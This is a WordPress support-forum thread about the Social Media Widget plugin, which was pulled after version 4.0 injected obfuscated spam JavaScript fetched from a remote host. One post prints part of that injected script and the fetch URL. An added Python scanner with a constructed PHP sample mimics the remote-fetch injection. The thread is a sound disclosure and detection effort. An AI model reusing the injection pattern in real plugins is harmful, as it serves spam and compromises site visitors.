Social Media Widget
[resolved] Anyone know why Social Media Widget was removed? (30 posts)

  1. mvandemar
    Member
    Posted 1 year ago #

    I am rebuilding a client's site that was hacked, and this is one of the plugins they were using. I went to grab a fresh copy and it looks like it was yanked from the repositories some time in the past week. Does anyone happen to know why? I can still access the most recent version via downloads.wordpress.org, but I don't want to use it if it was pulled due to security concerns.

    Thanks.

    -Michael

    http://wordpress.org/extend/plugins/social-media-widget/

  2. Krishna
    Volunteer Moderator
    Posted 1 year ago #

    I think you posted a wrong link above. Try that. Which plugin out of the list there do you want to download?

  3. annoyingmouse
    Member
    Posted 1 year ago #

    Changelog of version 4.0.1 mentions removal of potentially malicious code.
    I don't know why 4.0.1 is not visible through /extend/plugins, but through /support/plugin it is:

    http://wordpress.org/support/plugin/social-media-widget

  4. peter
    Member
    Posted 1 year ago #

    SMW 4.0 was infected. It retrieved the file contents of http://i.aaur.net/i.php which would inject the following into your pages, just after the widget:

    <script type="text/javascript">
    <!--//--><![CDATA[//><!--
    function nemoViewState(){
    var a=0,m,v,t,z,x=new 
    
    redacted
    
    t=z='';
    for(v=0;v<m.length;){t+=m.charAt(v++);
    if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
    //--><!]]>
    </script>
    <p class="nemonn"><a href="http://paydaypam.co.uk/" title="Payday Loan">payday loans</a></p>

    Nemo is also discussed here: http://blog.sucuri.net/2012/12/website-malware-sharp-increase-in-spam-attacks-wordpress-joomla.html.

    Version 4.0.1 of SMW does not retrieve http://i.aaur.net/i.php anymore and seems to be ok.
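    An added example, not code from the thread or from the plugin: a small Python scanner for plugin source that flags the indicators named in the post above (the i.aaur.net fetch URL, the nemoViewState function and the nemonn class) and, more generally, any PHP fetch call that reads a literal remote http(s) URL, which is how the payload was pulled in. The sample PHP it runs on is constructed to mimic the described behaviour; hits on the generic pattern still need manual review, since legitimate plugins also fetch remote content.

```python
import re
from pathlib import Path
from typing import Dict, List

# Indicators quoted in the thread: the remote fetch URL, the injected JavaScript
# function name and the CSS class used for the injected spam link.
KNOWN_INDICATORS = [
    r"i\.aaur\.net/i\.php",
    r"nemoViewState",
    r'class="nemonn"',
]

# Generic heuristic: a PHP fetch function called on a literal remote URL.
# This is the mechanism SMW 4.0 used to obtain the payload it echoed into pages.
REMOTE_FETCH = re.compile(
    r"\b(file_get_contents|curl_init|fopen|wp_remote_get)\s*\(\s*['\"]https?://",
    re.IGNORECASE,
)


def scan_source(text: str, name: str = "<inline>") -> List[Dict[str, str]]:
    """Return one finding per (line, rule) hit for a single PHP source text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for pat in KNOWN_INDICATORS:
            if re.search(pat, line):
                findings.append({"file": name, "line": str(lineno),
                                 "kind": "known-indicator", "match": pat})
        m = REMOTE_FETCH.search(line)
        if m:
            findings.append({"file": name, "line": str(lineno),
                             "kind": "remote-fetch", "match": m.group(0)})
    return findings


def scan_plugin_dir(root: str) -> List[Dict[str, str]]:
    """Scan every .php file below a directory such as wp-content/plugins/."""
    findings = []
    for path in Path(root).rglob("*.php"):
        findings.extend(scan_source(path.read_text(errors="replace"), str(path)))
    return findings


# Constructed sample (not the real plugin source): fetch a remote file and echo
# its contents right after the widget markup, as the post describes.
SAMPLE_WIDGET_PHP = """<?php
function smw_widget_footer() {
    echo '</div>';
    $extra = file_get_contents('http://i.aaur.net/i.php');
    echo $extra;
}
"""

if __name__ == "__main__":
    for f in scan_source(SAMPLE_WIDGET_PHP, "social-widget.php"):
        print(f"{f['file']}:{f['line']} [{f['kind']}] {f['match']}")
```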

  5. Samuel Wood (Otto)
    Tech Ninja
    Posted 1 year ago #

    We forced an update to remove the discovered malware from already existing sites, however I highly recommend that you find another plugin.

  6. perezbox
    Member
    Posted 1 year ago #

    Like Otto states, I would not recommend using that plugin any time soon. Even if the version has been updated to address the issue, it's a big concern that it even made it into the core of the plugin at all. This tells you that there is a serious access problem for that dev.

  7. mvandemar
    Member
    Posted 1 year ago #

    @Krishna - that is the correct link. I was discussing a plugin that had been taken down, seeing a "We couldn't find that plugin." message is expected in this case.

    Everyone else, thanks. When I grabbed the download using Google's cache the version of the plugin I got was 3.3 (social-media-widget.3.3.zip). Were there any issues with that version?

    I just checked and I do not see the code referenced in it, so it is probably ok, but I will alert my client that they should probably switch. Thanks. :)

    -Michael

  8. brianfreytag
    Member
    Posted 1 year ago #

    I just want to make it clear that I have not been the maintainer of Social Media Widget since January of 2013 (version 2.9.7).

    This post is to disassociate myself with this issue. I want the record to reflect that this issue arose months after I passed off the widget and have not had SVN access since signing over the widget in January. As the original creator of Social Media Widget and beginning its legacy, I want to remain clean of this in the case I decide to release a new WordPress plugin.

    I had a discussion with the current maintainer, to whom I transferred the rights. It seems that one of the freelancers that he hired to do some updates decided to go rogue or his password was cracked, though you will have to hear it from him for the full story.

    -- Update - Changed the version I last pushed in the first paragraph

  9. Krishna
    Volunteer Moderator
    Posted 1 year ago #

    I just checked and I do not see the code referenced in it, so it is probably ok

    No, in view of what Otto stated above, I feel that you should not use the plugin and find another one in its place.

  10. annoyingmouse
    Member
    Posted 1 year ago #

    Hi Brian,

    I have a hard time believing what the current maintainer says. Several weeks ago, he was notified that something weird was going on in this thread: http://wordpress.org/support/topic/strange-url-in-social-widgetphp

    Since then, he didn't investigate? He didn't clean up? The code just got replaced by code that was not that easy to spot.

    Can't you take ownership of the project again?

  11. peter
    Member
    Posted 1 year ago #

    Version 3.3 contained the malware already - but with some different code, accessing [ redacted, really you do not have to share malware links here ]

    You can get all versions of the plugin from svn ( http://plugins.svn.wordpress.org/social-media-widget )

    Version 4.0.1 is without the malicious code but like others say, best is obviously to remove this plugin altogether.

  12. Samuel Wood (Otto)
    Tech Ninja
    Posted 1 year ago #

    We are working with the current maintainer of the plugin to ensure that everything is good, all problems are solved, all i's dotted and all t's crossed.

    In the meantime, the plugin will remain in its current state until all the issues can be resolved with it. Speculation is unnecessary at this time. Okay? Everybody just pause until we sort it out, thanks. :)

  13. brianfreytag
    Member
    Posted 1 year ago #

    @annoyingmouse - I can't really comment on anything beyond what was said in my post. I only posted it to keep my name clean - not to speculate on the outcome.

    I have every confidence in Otto and his team to get this issue resolved the way it has to be resolved.

  14. Samuel Wood (Otto)
    Tech Ninja
    Posted 1 year ago #

    The issue has been resolved and the plugin has been made available once again.

  15. mindctrl
    Member
    Posted 1 year ago #

    Otto, you forced an update onto sites to remove the malware from them? Without the admins clicking upgrade? How do you go about doing that?

  16. perezbox
    Member
    Posted 1 year ago #

    Hi Otto

    I'm having a very hard time with your latest insight.

    What insight can you provide that will help reassure plugin users that this has in fact been resolved? Speaking of which, what exactly was resolved?

    I have a hard time understanding how this is being allowed back in the repo, maybe you have all the answers you need, but allowing it back in the repo essentially tells people it's good to go and you're putting your name behind it as the approver. This is a pretty blatant abuse of trust by the author, and not much has been said from them on how it happened and how it has been addressed.

    Tony

  17. perezbox
    Member
    Posted 1 year ago #

    @mindctrl, wow, that's not what I understood from his message. Where do you see that?

  18. karenalenore
    Member
    Posted 1 year ago #

    This malicious code has embedded itself throughout my site, in core components, other plugin folders, theme files etc. If we update to the latest version, is it gonna clean up that mess or am I completely screwed. I was using this plugin on about 25 sites!! This is a nightmare.

  19. mvandemar
    Member
    Posted 1 year ago #

    @mindctrl - they can't actually update your WordPress for you, you can read more about that here if you like: WordPress and infected plugins.

    @karenalenore - while this plugin was bad, I did not see an actual back door in it when I looked, and I haven't heard of anyone else getting hit like that. The code does embed itself on every page, that is true, but it should go away once you remove the plugin. Did you remove it yet? I would be happy to take a look and see if you have anything else going on if you are still having symptoms. Just let me know.

  20. perezbox
    Member
    Posted 1 year ago #

    @karenalenore yeah I'm with @mvandemar, not seeing any evidence of this being used for what you're saying. Are you sure that is the source and you don't have other issues in your site? You might want to open a ticket in the hacked or malware tracks for help.

    Thanks

  21. WPyogi
    Volunteer Moderator
    Posted 1 year ago #

  22. karenalenore
    Member
    Posted 1 year ago #

    Thanks all. I bet I have both problems going on simultaneously. It's hard to sort one problem from the other... Some sites have corrupted server files and folders with the injected code and some other sites have front end injected code. No two sites are alike. I was dying to figure out the common thread as they are on different servers, different accounts, use different plugins, etc.

    Thanks for the resources. I'm going to go through this one site at a time and see if I can get them clean. (There goes a whole day of productivity. blah.)

  23. mvandemar
    Member
    Posted 1 year ago #

    I was dying to figure out the common thread as they are on different servers, different accounts, use different plugins, etc

    First thing I would point out is that you are a common thread there. There are certain PC viruses that will steal passwords from your FTP client config, assuming they are stored there, and infect your sites that way. I would highly recommend that any non-Mac, non-Linux users (i.e. all Windows users) who have FTP access to your sites run thorough anti-virus scans on their machines.

    Also, if an account has more than one site on it (i.e. multiple sites accessible from the same FTP login) then it usually only takes a back door on one of them to infect the rest on that particular account. So, I would look for common traits between accounts as well, not just sites, if you happen to have that kind of setup going on with any of them.

  24. Blink Web Effects
    Member
    Plugin Author
    Posted 1 year ago #

    All,

    First, we are sorry that this is the first communication from us since this all started. Shortly after the spam injection commenced, our wordpress.org account was locked and we were unable to log in or post. We have only now regained access to the plugin and our account after discussions with Otto.

    We are greatly sorry for allowing this spam injection to occur. We trusted the wrong people with our plugin code and take full responsibility. We are a marketing company at heart and are not actually developers, so in order to provide major updates and improvements, we had to seek outside help. Some of these people deceived us and abused our trust and naivety. We had no idea that the malicious code was in fact malicious or could do something like this. We only went by what was told to us by those we trusted with the plugin code. We will not make this mistake again.

    We hope you can come back to SMW now that this has been cleaned up, but we understand we have a long way to go to build trust back up with the WordPress community. As of version 4.0.1, SMW is safe and spam-free, and will remain that way.

    If you need to get in touch with us, you may email us at blinkwebeffects@gmail.com

  25. Samuel Wood (Otto)
    Tech Ninja
    Posted 1 year ago #

    @perezbox

    Hi Tony!

    Naturally we do take a very hard line on spam, and obviously an author putting malicious code into a plugin is enough grounds for us to bring down the ban hammer.

    But there are natural circumstances where an author may not be at fault. For example, if his password had been used by malicious persons without his knowledge, then we wouldn't hold the plugin author responsible for that, but would work with them to clean up the plugin, secure their account, and advise them on how not to let it happen again.

    In this case, the original author of the plugin and the current maintainer of the plugin have made it clear what has occurred here. Basically, the current maintainer is not a professional programmer, and put his trust in the wrong freelancers to do the coding work for him. Though he did check in the malicious code, it's clear from our communications that he was unaware of its nature. Both me and Scott have examined the current plugin code and determined that it has no malicious intent (after we removed the problem code), and it would be unfair to the users of the plugin as well as the current maintainer to have an absolute "zero-tolerance" policy for all cases.

    People make mistakes. In this case, the current owner of the plugin put his trust in the wrong place. I'm confident that he won't do that again, and regardless we'll be watching the plugin for changes. Anybody else is free to do so as well, it is easy to subscribe to the plugin changes via email, and get notified of every commit to a plugin's code.

    So the plugin is back up for now, and as long as it stays clean, it's fine. :)

  26. Samuel Wood (Otto)
    Tech Ninja
    Posted 1 year ago #

    @mindctrl: I think you misunderstood my original post. We have no ability to "force" code onto other people's sites. However, we do control the plugin directory, and have the ability to change plugins and bump their version numbers. In this case, we removed the problem code from the plugin, and bumped the version number from 4.0 to 4.0.1. When we did that, sites running the plugin would have received an upgrade notice. However, those sites would still have to click the update button to get the new code.

  27. karenalenore
    Member
    Posted 1 year ago #

    @mvandemar I recognize that I am that thread. I've scanned my machines, changed passwords and all but don't see how that happened from my end.

    On my Rackspace accounts, each site that used this widget showed malware and once I removed it, they seem to be scanning clean for the moment.

    On my Hostgator accounts, we have both problems. I'm still dealing with tech support to get those clean.

    One thought, I use managewp.com to manage my sites and run updates. I've been in contact with them and they assure me there is no way these problems could have originated with them. Anyone else have thoughts on that one? Should I look towards the hosts as the problem beyond this plugin's ill doings?

    I appreciate the active discussion here to commiserate my suffering, even if I have to do the work in the end. :)

  28. mvandemar
    Member
    Posted 1 year ago #

    @karenalenore - I love Hostgator, and one of the reasons is their security. I have cleaned a ton of sites for clients and never have I found an issue with them, so I would definitely not worry about it being them.

    If they are having trouble getting you cleaned, if you want I can scan one of your accounts for you, send you a list of all back doors I find. It might not tell you how the site got hit initially, but it could help them discover what they are missing on the other accounts. My site is in my profile, and there is a contact form there.

  29. perezbox
    Member
    Posted 1 year ago #

    Hi Otto

    That makes sense, every circumstance is different.

    Thanks

    Tony

  30. brianfreytag
    Member
    Posted 1 year ago #

    @karenalenore - One thing you should check is if you're using any kind of caching plugins. If you're doing disk or opcache caching of pages/posts and didn't clear the cache after removing the plugin, the whole thing or remnants of the widget will remain in place until they expire or you delete them.
